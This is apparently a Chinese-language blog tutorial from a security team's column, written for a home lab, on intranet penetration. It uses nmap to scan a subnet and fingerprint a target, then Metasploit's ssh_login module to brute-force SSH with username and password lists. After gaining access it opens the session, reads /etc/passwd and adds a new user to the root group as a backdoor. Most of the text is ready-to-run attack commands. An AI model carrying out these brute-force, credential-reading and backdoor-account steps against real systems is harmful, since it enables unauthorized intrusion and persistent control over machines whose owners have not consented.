內網滲透之掃描與SSH暴力破解
05-20
內網滲透之掃描與SSH暴力破解
來自專欄 ChaMd5安全團隊
掃描區域網存活主機
注意:以下使用的ip地址為我部署的環境網段,如果你在看本文,請靈活的進行學習以及使用。目標主機=靶機
nmap -sP 192.168.1.0/24
掃描靶機的操作系統以及版本號
nmap -O 192.168.1.111
掃描靶機的應用程序以及應用程序的版本號
nmap -sV 192.168.1.111
利用msf ssh_login模塊暴力破解靶機ssh密碼
先打開MSF 進入ssh_login模塊 show options查看提示
使用ssh_login模塊
use auxiliary/scanner/ssh/ssh_login
設定靶機IP
set RHOSTS 192.168.1.111
設置賬號文件/設置賬號
你可以設置賬號,但是只嘗試這一個,建議你使用賬號文件
#設置賬號set USERNAME root
#設置賬號文件set USER_FILE 密碼文件
設置密碼文件/設置密碼
你可以設置密碼,但是只嘗試這一個,建議你使用密碼文件
#設置密碼set PASSWORD 123456
#設置密碼文件set PASS_FILE 密碼文件
運行
你既可以使用run
也可以使用exploit
會話
查詢會話方面的信息
sessions -i
打開會話
#打開id為1的會話 輸入ifconfig查詢ip 成功sessions -i 1
查看密碼文件
cat /etc/passwd
添加用戶設置密碼並添加到root組
useradd admin123passwd admin123usermod -g root admin123
推薦閱讀:
※發財樹說016-安全領域,360的顛覆者的來了
※入侵特斯拉——智能汽車安全性分析
※北上廣深的請注意,阿里聚安全來找你玩啦
※信息安全的商業模式
※如何找回WhatsApp被刪除的消息
TAG:網路安全 |